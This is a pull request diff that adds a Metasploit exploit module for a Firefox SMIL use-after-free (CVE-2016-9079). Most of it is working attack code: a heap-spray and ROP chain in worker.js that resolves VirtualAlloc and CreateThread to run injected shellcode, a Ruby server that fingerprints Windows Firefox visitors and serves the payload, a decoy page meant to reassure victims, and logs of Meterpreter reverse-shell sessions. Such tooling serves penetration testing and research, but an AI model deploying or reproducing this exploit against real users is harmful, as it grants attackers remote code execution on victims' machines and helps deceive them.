### PR TITLE
Firefox nsSMILTimeContainer::NotifyTimeChange() rce (CVE 2016-9079)

### DIFF
--- a/data/exploits/firefox_smil_uaf/post.html
+++ b/data/exploits/firefox_smil_uaf/post.html
@@ -1,0 +1,1 @@
+<html><body bgcolor="#2F3236"><center><div><iframe width="1280" height="720" src="https://www.youtube.com/embed/wArxEk0Rxhc?autoplay=1" frameborder="0" allowfullscreen></iframe></div></center></body></html>

--- a/data/exploits/firefox_smil_uaf/worker.js
+++ b/data/exploits/firefox_smil_uaf/worker.js
@@ -1,0 +1,362 @@
+var window = self;
+
+  function Memory(b,a,f) 
+  { 
+      this._base_addr=b; 
+      this._read=a; 
+      this._write=f; 
+      this._abs_read = function(a) { 
+          a >= this._base_addr ? a = this._read( a - this._base_addr) : ( a = 4294967295 - this._base_addr + 1 + a, a = this._read(a) );
+          return 0>a?4294967295+a+1:a
+          
+      };
+      this._abs_write = function(a,b) {
+          a >= this._base_addr ? this._write(a - this._base_addr, b) : ( a = 4294967295 - this._base_addr + 1 + a, this._write(a,b) )
+      };
+      this.readByte = function(a) { 
+          return this.read(a) & 255
+          
+      };
+      this.readWord = function(a) {
+          return this.read(a) & 65535
+      };
+      this.readDword = function(a){ return this.read(a) };
+      this.read = function(a,b) { 
+          if (a%4) {
+              var c = this._abs_read( a & 4294967292),
+                  d = this._abs_read( a+4 & 4294967292),
+                  e = a%4;
+              return c>>>8*e | d<<8*(4-e)
+          }
+          return this._abs_read(a)
+      };
+      this.readStr = function(a) { 
+          for(var b = "", c = 0;;) {
+              if (32 == c)
+                  return "";
+              var d = this.readByte(a+c);
+              if(0 == d)
+                  break;
+              b += String.fromCharCode(d);
+              c++
+          }
+          return b
+          
+      };
+      this.write = function(a){}
+  }
+
+  function PE(b,a) { 
+      this.mem = b;
+      this.export_table = this.module_base = void 0;
+      this.export_table_size = 0;
+      this.import_table = void 0;
+      this.import_table_size = 0;
+      this.find_module_base = function(a) { 
+          for(a &= 4294901760; a; ) { 
+              if(0x5a4d == this.mem.readWord(a))
+                  return this.module_base=a;
+              a -= 65536
+          }
+      };
+      this._resolve_pe_structures = function() { 
+          peFile = this.module_base + this.mem.readWord(this.module_base+60);
+          if(0x4550 != this.mem.readDword(peFile))
+              throw "Bad NT Signature";
+
+          this.pe_file = peFile;
+          this.optional_header = this.pe_file+36;
+          this.export_directory = this.module_base+this.mem.readDword(this.pe_file+120);
+          this.export_directory_size = this.mem.readDword(this.pe_file+124);
+          this.import_directory=this.module_base+this.mem.readDword(this.pe_file+128);
+          this.import_directory_size=this.mem.readDword(this.pe_file+132)};
+          this.resolve_imported_function=function(a,b){
+              void 0==this.import_directory&&this._resolve_pe_structures();
+              for(var e=this.import_directory,c=e+this.import_directory_size;e<c;){
+                  var d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base);
+                  if(a.toUpperCase()==d.toUpperCase()){
+                      for(var c = this.mem.readDword(e) + this.module_base,
+                              e = this.mem.readDword(e+16) + this.module_base, 
+                              d = this.mem.readDword(c), 
+                              f = 0 ; 0 !=d ; )
+                      {
+                          if(this.mem.readStr(d+this.module_base+2).toUpperCase() == b.toUpperCase())
+                              return this.mem.readDword(e+4*f);
+                          f++;
+                          d = this.mem.readDword(c+4*f)
+                      }
+                      break
+                  }
+                  e+=20
+              }
+              return 0
+          };
+          void 0!=a && this.find_module_base(a)
+      }
+
+    function ROP(mem,a){
+       this.mem = mem;
+       this.pe = new PE(mem,a);
+       this.pe._resolve_pe_structures();
+       this.module_base = this.pe.module_base + 0x1000;
+       
+       this.findSequence = function(seq) { 
+          for(var b=0;;) { 
+              for(var e=0,c=0;c<seq.length;c++)
+                  if(this.mem.readByte(this.module_base+b+c)==seq[c]&&e==c)
+                      e++;
+                  else 
+                      break;
+              if(e==seq.length)
+                  return this.module_base+b;
+              b++
+            
+       }
+        
+   };
+   this.findStackPivot=function() {
+       return this.findSequence([0x94, 0xc3])
+      
+   };
+   this.findPopRet=function(a) { 
+       return this.findSequence([0x58, 0xc3])
+      
+   };
+   this.ropChain=function(base, vtOffset, array = undefined) { 
+       var buf = undefined
+       if (array != undefined)
+        buf = array
+      else
+        buf = new ArrayBuffer(0x1000)
+       ropBuff = new Uint32Array(buf);
+       var stackPivot = this.findStackPivot(),
+           popRet = this.findPopRet("EAX"),
+           virtualAllocAddr = this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc");
+
+       ropBuff[0]= popRet+1;
+       ropBuff[1]= popRet;
+       ropBuff[2]= base+vtOffset+4;
+       ropBuff[3]= stackPivot;
+       ropBuff[vtOffset>>2] = stackPivot;
+
+       offset = (vtOffset+4>>2);
+       ropBuff[offset++]=virtualAllocAddr;
+       ropBuff[offset++]=base+(vtOffset+0x1c);
+       ropBuff[offset++]=base;
+       ropBuff[offset++]=0x1000;
+       ropBuff[offset++]=0x1000;
+       ropBuff[offset++]=0x40;
+       ropBuff[offset++]=0xcccccccc;
+       
+       return ropBuff;
+   }
+}
+
+var conv=new ArrayBuffer(8)
+var convf64=new Float64Array(conv)
+var convu32=new Uint32Array(conv)
+
+var qword2Double=function(b,a) { 
+  convu32[0]=b;
+  convu32[1]=a;
+  return convf64[0]
+}
+
+var doubleFromFloat = function(b,a) { 
+  convf64[0]=b;
+  return convu32[a]
+}
+
+var sprayArrays=function() {
+  var mArray = new Array(0x1fffe)  
+  var arrBuf = new ArrayBuffer(0x100000);
+  var dwArray =  new Uint32Array(arrBuf)
+  var qwArray = new Float64Array(arrBuf, 0x10)
+
+
+  for (var i = 0; i < 0x1fffe; i++)
+    mArray[i] = qword2Double(0, 0);
+  
+   mArray[2]     = qword2Double(arrBase + 0xaf0, 0)
+   mArray[0xe]   = qword2Double(arrBase +  0x08, 0)
+   mArray[0x15]  = qword2Double(0, 0x02)
+   mArray[0x21]  = qword2Double(0x02, 0)
+   mArray[0x22]  = qword2Double(arrBase + 0x2f0, arrBase + 0x1f0)
+   mArray[0x3e]  = qword2Double(0, arrBase + 0x3f0)
+   mArray[0x5e]  = qword2Double(arrBase + 0x4f0, 0)
+   mArray[0x80]  = qword2Double(0x02, 0)
+   mArray[0x9f]  = qword2Double(arrBase + 0x500,0)
+   mArray[0xa0]  = qword2Double(0, 0xf0000000)
+   mArray[0xa2]  = qword2Double(0, 0xbff00000)
+   mArray[0xa4]  = qword2Double(0x02, 0)
+   mArray[0xa5]  = qword2Double(0x01, 0)
+   mArray[0xaa]  = qword2Double(0, arrBase + 0x5f0)
+   mArray[0xac]  = qword2Double(arrBase + 0x6f0, arrBase + 0x700)
+   mArray[0xb3]  = qword2Double(0, 0x02)
+   mArray[0xb4]  = qword2Double(0, 0)
+   mArray[0xde]  = qword2Double(arrBase + 0x7f0, 0)
+   mArray[0xfe]  = qword2Double(0x01, 0);
+   mArray[0xff]  = qword2Double(0, 0x10000000)
+   mArray[0x15e] = qword2Double(0x07, 0)
+   mArray[0x15f] = qword2Double(arrBase + 0xf0, arrBase - 0x10 + 0x05)
+   mArray[0x160] = qword2Double(arrBase - 0x07, arrBase - 0x10 + 0x0d)
+   mArray[0x161] = qword2Double(arrBase + 0x10000b, arrBase + 0x100007)
+   mArray[0x162] = qword2Double(arrBase + 0x100003, 0)
+   mArray[0x202] = qword2Double(arrBase + 0x1af0, 0)
+   mArray[0x20e] = qword2Double(arrBase + 0x1008, 0)
+   mArray[0x215] = qword2Double(0, 0x02)
+   mArray[0x221] = qword2Double(0x02, 0)
+   mArray[0x222] = qword2Double(arrBase + 0x12f0, arrBase + 0x11f0)
+   mArray[0x23e] = qword2Double(0, arrBase + 0x13f0)
+   mArray[0x25e] = qword2Double(arrBase + 0x14f0, 0)
+   mArray[0x280] = qword2Double(0x02, 0)
+   mArray[0x29f] = qword2Double(arrBase + 0x1500,0)
+   mArray[0x2a0] = qword2Double(0, 0xf0000000)
+   mArray[0x2a2] = qword2Double(0, 0xbff00000)
+   mArray[0x2a4] = qword2Double(0x02, 0)
+   mArray[0x2a5] = qword2Double(0x01, 0)
+   mArray[0x2aa] = qword2Double(0, arrBase + 0x15f0)
+   mArray[0x2ac] = qword2Double(arrBase + 0x16f0, arrBase + 0x1700)
+   mArray[0x2b3] = qword2Double(0, 0x02)
+   mArray[0x2b4] = qword2Double(0, 0x00)
+   mArray[0x2de] = qword2Double(arrBase + 0x17f0, 0)
+   mArray[0x2fe] = qword2Double(0x01, 0)
+   mArray[0x2ff] = qword2Double(0, 0x10000000)
+
+  var i = mArray.length;
+  while(i--) {qwArray[i] = mArray[i];}
+
+  for (var i = 0; i < spr.length; i += 2)
+  {
+    spr[i] = mArray.slice(0)
+    spr[i + 1] = arrBuf.slice(0)
+  }
+}
+
+var spr = new Array(400)
+var arrBase = 0x22100010;
+
+// insert codes here   \/ ------
+Shellcode = unescape("INSERTSHELLCODEHEREPLZ");
+
+if (Shellcode.length % 2 != 0)
+  Shellcode += "NOPSGOHERE";
+
+sprayArrays();
+postMessage(arrBase)
+
+
+var len = spr[0].length;
+var mArray = undefined;
+var dwArray = undefined;
+var qwArray = undefined;
+var container = undefined;
+
+while (mArray == undefined)
+{
+  for (var i = 0; i < spr.length; i += 2)
+  {
+    if (spr[i].length != len)
+    {
+      container = dwArray = new Uint32Array(spr[i + 1])
+      qwArray = new Float64Array(spr[i + 1], 0x10)
+      if (dwArray[1] == 0)
+      {
+        dwArray = new Uint32Array(spr[i - 1])
+        dwArray[0] = dwArray[1] = dwArray[2] = dwArray[3] = 0xdea110c8;
+        qwArray = new Float64Array(spr[i - 1], 0x10)
+      }
+      mArray = spr[i];
+      break;
+    }
+  }
+}
+
+var off = 0x100000;
+if (dwArray != container)
+  off = off * 2;
+
+var memory = new Uint32Array(0x10);
+var len = memory.length;
+mArray[0x20000] = memory;
+ropArrBuf = new ArrayBuffer(0x1000)
+mArray[0x20001] = ropArrBuf;
+ropArrBufPtr = container[0x6]
+
+targetAddr = container[4] + 0x1b;
+var arrayBase = container[4] + 0x30;
+
+mArray[0x20000] = undefined;
+mArray[0x20001] = undefined;
+
+var n = 0x40;
+qwArray[0x35e] = mArray[0x35e] = qword2Double(n + 1, 0)
+qwArray[0x35f] = mArray[0x35f] = qword2Double(arrBase - 0x10 + 0x1100, targetAddr)
+for (var i = 0; i < (n/2); i++)
+  qwArray[0x360 + i] = mArray[0x360 + i] = qword2Double(targetAddr, targetAddr)
+
+container[0] = container[1] = container[2] = container[3] = 0xffffff81;
+qwArray[0x1e] = mArray[0x1e] = qword2Double(0xdea110c8, 0)
+qwArray[0xfe] = mArray[0xfe] = qword2Double(2, 0)
+qwArray[0xb3] = mArray[0xb3] = qword2Double(0, 3)
+qwArray[0xa9] = mArray[0xa9] = qword2Double(0, 2)
+
+while (memory.length == len) {}
+
+
+var mem = new Memory(arrayBase, 
+                    function(b) { return memory[b/4]; }, 
+                    function(b,a) { memory[b/4] = a;  });
+
+var ptr = targetAddr - 0x1b;
+var xulPtr = mem.readDword(ptr + 0xc);
+var rop = new ROP(mem, xulPtr);
+var ropBase = mem.readDword(ropArrBufPtr + 0x10);
+rop.ropChain(ropBase, 0x130, ropArrBuf);
+var backupESP = rop.findSequence(Array(0x89, 0x01, 0xc3))
+var ropChain = new Uint32Array(ropArrBuf)
+ropChain[0] = backupESP;
+CreateThread = rop.pe.resolve_imported_function('KERNEL32.dll', 'CreateThread')
+
+ropChain[0x12c >> 2] = ropChain[0x130 >> 2];
+
+for (var i = 0; i < ropChain.length; i++)
+{
+  if (ropChain[i] == 0xcccccccc)
+    break;
+}
+
+ropChain[i++] = 0xc4819090;
+ropChain[i++] = 0x00000800;
+ropChain[i++] = 0x5050c031;
+ropChain[i++] = 0x5b21eb50;
+ropChain[i++] = 0xb8505053;
+ropChain[i++] = CreateThread;
+ropChain[i++] = 0xb890d0ff;
+ropChain[i++] = arrBase + 0x2040;
+ropChain[i++] = 0x5f58208b;
+ropChain[i++] = 0xbe905d58;
+ropChain[i++] = 0xFFFFFF00;
+ropChain[i++] = 0x000cc2c9;
+ropChain[i++] = 0xffffdae8;
+ropChain[i++] = 0x909090ff;
+
+for (var j = 0; j < Shellcode.length; j += 2)
+  ropChain[i++] = Shellcode.charCodeAt(j) + Shellcode.charCodeAt(j + 1) * 0x10000;
+
+mArray[0x400] = qwArray[0x400] = qword2Double(arrBase + 0x2000, 0)
+mArray[0x400 + (0x10 >> 3)] = qwArray[0x400 + (0x10 >> 3)] = qword2Double(0, arrBase + 0x2040)
+mArray[0x400 + (0x18 >> 3)] = qwArray[0x400 + (0x18 >> 3)] = qword2Double(4, 0)
+mArray[0x400 + (0x40 >> 3)] = qwArray[0x400 + (0x40 >> 3)] = qword2Double(ropBase, 0)
+mArray[0x400 + (0xac >> 3)] = qwArray[0x400 + (0xac >> 3)] = qword2Double(0, 2)
+
+for (var i = 0; i < 4; i++) {
+  container[0x400 + i] = 0xdea110c8
+}
+
+qwArray[0x21e] = mArray[0x21e] = qword2Double(0xdea110c8, 0)
+qwArray[0x2fe] = mArray[0x2fe] = qword2Double(2, 0)
+qwArray[0x2b3] = mArray[0x2b3] = qword2Double(0, 3)
+qwArray[0x2a9] = mArray[0x2a9] = qword2Double(0, 2)
+
+postMessage("!")

--- a/documentation/modules/exploit/windows/browser/firefox_uaf_smil.md
+++ b/documentation/modules/exploit/windows/browser/firefox_uaf_smil.md
@@ -1,0 +1,75 @@
+HP Data Protector is an automated backup and recovery software for single-server to enterprise
+environments. It provides cross-platform, online backup of data for Microsoft Windows, Unix,
+and Linux operating systems.
+
+While the server is using Encrypted Control Communication, HP Data Protector allows a remote
+attacker to gain access without authentication, and gain arbitrary code execution under the
+context of SYSTEM.
+
+
+## Vulnerable Application
+
+HP Data Protector versions 7, 8, and 9 are known to be affected.
+
+hp_dataprotector_encrypted_comms was specifically tested against version 9.0.0 on Windows 2008.
+
+## Verification Steps
+
+**Installing HP Data Protector**
+
+Before installing HP Data Protector, a Windows domain controller is needed. This exploit was tested
+against [a Windows Server 2008 R2 SP1 domain controller](https://www.youtube.com/watch?v=Buj9oEgbRt8).
+
+After setting up the domain controller, double-click on the HP Data Protector installer, and you
+should see this screen:
+
+![screen_1](https://cloud.githubusercontent.com/assets/13082457/15794665/99a86238-29e4-11e6-8ccd-0e09b0c8a693.png)
+
+Click on **Install Data Protector**. And then the installer should ask you which installation type:
+
+![screen_2](https://cloud.githubusercontent.com/assets/13082457/15794701/de31d07e-29e4-11e6-9410-0b88abe77afe.png)
+
+Make sure to select **Cell Manager**, and click **Next**. Use all default settings.
+
+**Enabling Encrypted Communication**
+
+After the Setup Wizard is finished, we need to enable encrypted communication. First, open the
+Data Protector GUI:
+
+![screen_3](https://cloud.githubusercontent.com/assets/1170914/15845344/d3a84ee4-2c37-11e6-821d-fe8002c94686.png)
+
+Click on **Clients**, and the local client from the tree. You should see the **Connection** tab on the
+right, click on that.
+
+![screen_4](https://cloud.githubusercontent.com/assets/1170914/15845351/df9929f8-2c37-11e6-9d82-8c519c030a5f.png)
+
+Under the Connection tab, there should be an **Encrypted control communication** checkbox, make
+sure that is checked. And then click **Apply**
+
+**Using hp_dataprotector_encrypted_comms**
+
+After the encrypted communication is enabled, you are ready to use
+hp_dataprotector_encrypted_comms. Here is what you do:
+
+1. Start msfconsole
+2. Do: ```use exploit/windows/misc/hp_dataprotector_encrypted_comms```
+3. Do: ```set RHOST [IP ADDRESS]```
+4. Do: ```set PAYLOAD [PAYLOAD NAME]```
+5. Set other options as needed
+6. Do: ```exploit```, and you should receive a session like the following:
+
+```
+msf exploit(hp_dataprotector_encrypted_comms) > run
+
+[*] Started reverse TCP handler on 172.16.23.1:4444 
+[*] 172.16.23.173:5555 - Initiating connection
+[*] 172.16.23.173:5555 - Establishing encrypted channel
+[*] 172.16.23.173:5555 - Sending payload
+[*] 172.16.23.173:5555 - Waiting for payload execution (this can take up to 30 seconds or so)
+[*] Sending stage (957999 bytes) to 172.16.23.173
+[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.173:49304) at 2016-06-06 22:16:54 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```
+

--- a/documentation/modules/exploit/windows/browser/firefox_uaf_smil.md
+++ b/documentation/modules/exploit/windows/browser/firefox_uaf_smil.md
@@ -1,75 +1,48 @@
-HP Data Protector is an automated backup and recovery software for single-server to enterprise
-environments. It provides cross-platform, online backup of data for Microsoft Windows, Unix,
-and Linux operating systems.
-
-While the server is using Encrypted Control Communication, HP Data Protector allows a remote
-attacker to gain access without authentication, and gain arbitrary code execution under the
-context of SYSTEM.
+Mozilla Firefox is a free, open-source web browser developed and maintained by the Mozilla Foundation.  Multiple versions are affected by a use-after-free vulnerability, detailed by CVE 2016-9079, that can result in arbitrary remote code execution.
 
 
 ## Vulnerable Application
 
-HP Data Protector versions 7, 8, and 9 are known to be affected.
+The vulnerability is present in all releases of Mozilla Firefox prior to 50.0.2
 
-hp_dataprotector_encrypted_comms was specifically tested against version 9.0.0 on Windows 2008.
+Firefox 38 through 41 were specifically chosen as targets for this module, though support for more releases is planned.
 
-## Verification Steps
+## Usage
 
-**Installing HP Data Protector**
+# UsePostHTML module option
 
-Before installing HP Data Protector, a Windows domain controller is needed. This exploit was tested
-against [a Windows Server 2008 R2 SP1 domain controller](https://www.youtube.com/watch?v=Buj9oEgbRt8).
+The module includes an option named UsePostHTML which is turned off by default.  Setting this option to true will result in the module sending an HTML page to the target to be rendered after successful exploitation.  This can be useful in convincing the target that they have arrived at a legitimate, benign website.  If desired, please edit $datadirectory/exploits/firefox_smil_uaf/post.html to suit your needs.  The included example file more than likely won't be suitable for your purposes.
 
-After setting up the domain controller, double-click on the HP Data Protector installer, and you
-should see this screen:
-
-![screen_1](https://cloud.githubusercontent.com/assets/13082457/15794665/99a86238-29e4-11e6-8ccd-0e09b0c8a693.png)
-
-Click on **Install Data Protector**. And then the installer should ask you which installation type:
-
-![screen_2](https://cloud.githubusercontent.com/assets/13082457/15794701/de31d07e-29e4-11e6-9410-0b88abe77afe.png)
-
-Make sure to select **Cell Manager**, and click **Next**. Use all default settings.
-
-**Enabling Encrypted Communication**
-
-After the Setup Wizard is finished, we need to enable encrypted communication. First, open the
-Data Protector GUI:
-
-![screen_3](https://cloud.githubusercontent.com/assets/1170914/15845344/d3a84ee4-2c37-11e6-821d-fe8002c94686.png)
-
-Click on **Clients**, and the local client from the tree. You should see the **Connection** tab on the
-right, click on that.
-
-![screen_4](https://cloud.githubusercontent.com/assets/1170914/15845351/df9929f8-2c37-11e6-9d82-8c519c030a5f.png)
-
-Under the Connection tab, there should be an **Encrypted control communication** checkbox, make
-sure that is checked. And then click **Apply**
-
-**Using hp_dataprotector_encrypted_comms**
-
-After the encrypted communication is enabled, you are ready to use
-hp_dataprotector_encrypted_comms. Here is what you do:
+**Using firefox_smil_uaf**
 
 1. Start msfconsole
-2. Do: ```use exploit/windows/misc/hp_dataprotector_encrypted_comms```
-3. Do: ```set RHOST [IP ADDRESS]```
+2. Do: ```use exploit/windows/browser/firefox_smil_uaf```
+3. Do: ```set payload [PREFERRED PAYLOAD]
 4. Do: ```set PAYLOAD [PAYLOAD NAME]```
-5. Set other options as needed
-6. Do: ```exploit```, and you should receive a session like the following:
+5. Set payload options as needed
+6. Do: ```run```, and have a target browse to the generated URL
+7. Once a vulnerable target connects, you should receive a session like this:
 
 ```
-msf exploit(hp_dataprotector_encrypted_comms) > run
+[*] Exploit running as background job.
 
-[*] Started reverse TCP handler on 172.16.23.1:4444 
-[*] 172.16.23.173:5555 - Initiating connection
-[*] 172.16.23.173:5555 - Establishing encrypted channel
-[*] 172.16.23.173:5555 - Sending payload
-[*] 172.16.23.173:5555 - Waiting for payload execution (this can take up to 30 seconds or so)
-[*] Sending stage (957999 bytes) to 172.16.23.173
-[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.173:49304) at 2016-06-06 22:16:54 -0500
+[*] Started reverse TCP handler on 192.168.79.132:6789 
+[*] Using URL: http://192.168.79.132:4567/lol
+[*] Server started.
+msf exploit(firefox_smil_uaf) > [*] 192.168.79.184   firefox_smil_uaf - Got request: /lol/
+[*] 192.168.79.184   firefox_smil_uaf - From: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
+[*] 192.168.79.184   firefox_smil_uaf - Sending exploit HTML ...
+[*] 192.168.79.184   firefox_smil_uaf - Got request: /lol/worker.js
+[*] 192.168.79.184   firefox_smil_uaf - From: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
+[*] 192.168.79.184   firefox_smil_uaf - Sending worker thread Javascript ...
+[*] Sending stage (957487 bytes) to 192.168.79.184
+[*] Meterpreter session 1 opened (192.168.79.132:6789 -> 192.168.79.184:52341) at 2017-01-20 11:25:38 -0600
+[*] Session ID 1 (192.168.79.132:6789 -> 192.168.79.184:52341) processing InitialAutoRunScript 'migrate -f'
+[*] Running module against WIN-UTRINKNPT3D
+[*] Current server process: firefox.exe (1448)
+[*] Spawning notepad.exe process to migrate to
+[+] Migrating to 2572
+[+] Successfully migrated to process 2572
 
-meterpreter > getuid
-Server username: NT AUTHORITY\SYSTEM
 ```
 

--- a/modules/exploits/windows/browser/firefox_smil_uaf.rb
+++ b/modules/exploits/windows/browser/firefox_smil_uaf.rb
@@ -21,7 +21,7 @@ require 'msf/core'
           'License'        => MSF_LICENSE,
           'Author'         =>
           [
-            'Anonymous gaijin',                                 # Original research/exploit
+            'Anonymous Gaijin',                                 # Original research/exploit
             'William Webb <william_webb[at]rapid7.com>'         # Metasploit module
           ],
           'Platform'       => 'win',

--- a/modules/exploits/windows/browser/firefox_smil_uaf.rb
+++ b/modules/exploits/windows/browser/firefox_smil_uaf.rb
@@ -1,0 +1,281 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+  class MetasploitModule < Msf::Exploit::Remote
+    Rank = GreatRanking
+
+    include Msf::Exploit::Remote::HttpServer
+
+    def initialize(info={})
+      super(update_info(info,
+        'Name'           => "Firefox nsSMILTimeContainer::NotifyTimeChange() RCE",
+        'Description'    => %q{
+          This module exploits an out-of-bounds indexing/use-after-free condition present in
+          nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox
+          on Microsoft Windows.
+          },
+          'License'        => MSF_LICENSE,
+          'Author'         =>
+          [
+            'Anonymous gaijin',                                 # Original research/exploit
+            'William Webb <william_webb[at]rapid7.com>'         # Metasploit module
+          ],
+          'Platform'       => 'win',
+          'Targets'        =>
+          [
+            [ 'Mozilla Firefox',
+              {
+                'Platform' => 'win',
+                'Arch'     => ARCH_X86,
+              }
+            ],
+          ],
+          'DefaultOptions'  =>
+          {
+            'EXITFUNC' => "thread",
+            'InitialAutoRunScript' => 'migrate -f'
+          },
+          'References'     =>
+          [
+            [ 'CVE', '2016-9079' ],
+            [ 'Bugzilla', '1321066' ]
+          ],
+          'Arch'           => ARCH_X86,
+          'DisclosureDate' => "May 10 2016",
+          'DefaultTarget'  => 0
+        )
+      )
+    register_options(
+      [
+        OptBool.new('UsePostHTML', [ true, 'Rewrite page with arbitrary HTML after successful exploitation.  NOTE: if set to true, you should probably rewrite data/exploits/ff_smil_uaf/post.html to something useful!', false ]),
+      ], self.class
+    )
+  end
+
+  def exploit_html(cli)
+    p = payload.encoded
+    arch = Rex::Arch.endian(target.arch)
+    payload_final = Rex::Text.to_unescape(p, arch, prefix='\\u')
+    base_uri = "#{get_resource.chomp('/')}"
+
+    # stuff that gets adjusted alot during testing
+
+    defrag_x = %Q~
+       for (var i = 0; i < 0x4000; i++)
+         heap80[i] = block80.slice(0)
+     ~
+     defrag_y = %Q~
+       for (var i = 0x4401; i < heap80.length; i++)
+         heap80[i] = block80.slice(0)
+     ~
+
+    js = %Q~
+    var worker = new Worker('#{base_uri}/worker.js');
+    var svgns = 'http://www.w3.org/2000/svg';
+    var heap80 = new Array(0x5000);
+    var heap100 = new Array(0x5000);
+    var block80 = new ArrayBuffer(0x80);
+    var block100 = new ArrayBuffer(0x100);
+    var sprayBase = undefined;
+    var arrBase = undefined;
+
+    var animateX = undefined;
+    var containerA = undefined;
+
+    var milestone_offset = 0x90;
+
+    var $ = function(id) { return document.getElementById(id); }
+
+    var heap = function()
+    {
+     var u32 = new Uint32Array(block80)
+
+     u32[4] = arrBase - milestone_offset;
+
+     u32[0xa] = arrBase + 0x1000 - milestone_offset;
+
+     u32[0x10] = arrBase + 0x2000 - milestone_offset;
+
+     var x = document.createElementNS(svgns, 'animate')
+     var svg = document.createElementNS(svgns, 'svg')
+
+     svg.appendChild(x)
+     svg.appendChild(x.cloneNode(true))
+
+     for (var i = 0; i < 0x400; i++)
+       {
+         var node = svg.cloneNode(true);
+         node.setAttribute('id', 'svg' + i)
+         document.body.appendChild(node);
+       }
+       #{defrag_x}
+
+       for (var i = 0; i < 0x400; i++)
+         {
+           heap80[i + 0x3000] = block80.slice(0)
+           $('svg' + i).appendChild(x.cloneNode(true))
+         }
+
+         for (var i = 0; i < 0x400; i++)
+           {
+             $('svg' + i).appendChild(x.cloneNode(true))
+             $('svg' + i).appendChild(x.cloneNode(true))
+           }
+
+           for (var i = 0; i < heap100.length; i++)
+             heap100[i] = block100.slice(0)
+
+             #{defrag_y}
+
+             for (var i = 0x100; i < 0x400; i++)
+               $('svg' + i).appendChild(x.cloneNode(true))
+             }
+
+             var exploit = function()
+             {
+               heap();
+
+               animateX.setAttribute('begin', '59s')
+               animateX.setAttribute('begin', '58s')
+               animateX.setAttribute('begin', '10s')
+               animateX.setAttribute('begin', '9s')
+
+               // money shot
+
+               containerA.pauseAnimations();
+             }
+
+             worker.onmessage = function(e)
+             {
+              worker.onmessage = function(e)
+              {
+               window.setTimeout(function()
+               {
+                 worker.terminate();
+                 document.body.innerHTML = '';
+                 document.getElementsByTagName('head')[0].innerHTML = '';
+                 document.body.setAttribute('onload', '')
+                 document.write('<blink>')
+                 }, 1000);
+  }
+
+  arrBase = e.data;
+  exploit();
+  }
+
+
+  var idGenerator = function()
+  {
+   return 'id' + (((1+Math.random())*0x10000)|0).toString(16).substring(1);
+  }
+
+
+  var craftDOM = function()
+  {
+   containerA = document.createElementNS(svgns, 'svg')
+   var containerB = document.createElementNS(svgns, 'svg');
+
+   animateX = document.createElementNS(svgns, 'animate')
+   var animateA = document.createElementNS(svgns, 'animate')
+   var animateB = document.createElementNS(svgns, 'animate')
+
+   var animateC = document.createElementNS(svgns, 'animate')
+
+   var idX = idGenerator();
+   var idA = idGenerator();
+   var idB = idGenerator();
+   var idC = idGenerator();
+
+   animateX.setAttribute('id', idX);
+   animateA.setAttribute('id', idA);
+   animateA.setAttribute('end', '50s');
+   animateB.setAttribute('id', idB);
+   animateB.setAttribute('begin', '60s');
+   animateB.setAttribute('end', idC + '.end');
+   animateC.setAttribute('id', idC);
+   animateC.setAttribute('begin', '10s');
+   animateC.setAttribute('end', idA + '.end');
+
+   containerA.appendChild(animateX)
+   containerA.appendChild(animateA)
+   containerA.appendChild(animateB)
+
+   containerB.appendChild(animateC)
+
+   document.body.appendChild(containerA);
+   document.body.appendChild(containerB);
+  }
+  window.onload = craftDOM;
+    ~
+
+    # If you want to change the appearance of the landing page, do it here
+
+    html = %Q~
+    <html>
+    <head>
+    <meta charset="utf-8"/>
+    <script>
+    #{js}
+    </script>
+    </head>
+    <body>
+    </body>
+    </html>
+    ~
+
+    if datastore['UsePostHTML']
+      f = File.open(File.join(Msf::Config.data_directory, "exploits", "firefox_smil_uaf", "post.html"), "rb")
+      c = f.read
+      html = html.gsub("<blink>", c)
+    else
+      html = html.gsub("<blink>", "")
+    end
+    send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
+  end
+
+  def worker_js(cli)
+    p = payload.encoded
+    arch = Rex::Arch.endian(target.arch)
+    payload = Rex::Text.to_unescape(p, arch)
+    wt = File.open(File.join(Msf::Config.data_directory, "exploits", "firefox_smil_uaf", "worker.js"), "rb")
+    c = wt.read
+    c = c.gsub("INSERTSHELLCODEHEREPLZ", payload)
+    c = c.gsub("NOPSGOHERE", "\u9090")
+    send_response(cli, c, { 'Content-Type' => 'application/javascript', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
+  end
+
+  def is_ff_on_windows(user_agent)
+    target_hash = fingerprint_user_agent(user_agent)
+    if target_hash[:ua_name] !~ /Firefox/ or target_hash[:os_name] !~ /Windows/
+      return false
+    end
+      return true
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Got request: #{request.uri}")
+    print_status("From: #{request.headers['User-Agent']}")
+    if (!is_ff_on_windows(request.headers['User-Agent']))
+      print_error("Unsupported user agent: #{request.headers['User-Agent']}")
+      send_not_found(cli)
+      close_client(cli)
+      return
+    end
+    if request.uri =~ /worker\.js/
+      print_status("Sending worker thread Javascript ...")
+      worker_js(cli)
+      return
+    end
+    if request.uri =~ /index\.html/ or request.uri =~ /\//
+
+      print_status("Sending exploit HTML ...")
+      exploit_html(cli)
+      close_client(cli)
+      return
+    end
+  end
+end

--- a/modules/exploits/windows/browser/firefox_smil_uaf.rb
+++ b/modules/exploits/windows/browser/firefox_smil_uaf.rb
@@ -45,7 +45,7 @@ require 'msf/core'
             [ 'Bugzilla', '1321066' ]
           ],
           'Arch'           => ARCH_X86,
-          'DisclosureDate' => "May 10 2016",
+          'DisclosureDate' => "Nov 30 2016",
           'DefaultTarget'  => 0
         )
       )


### PR DESCRIPTION
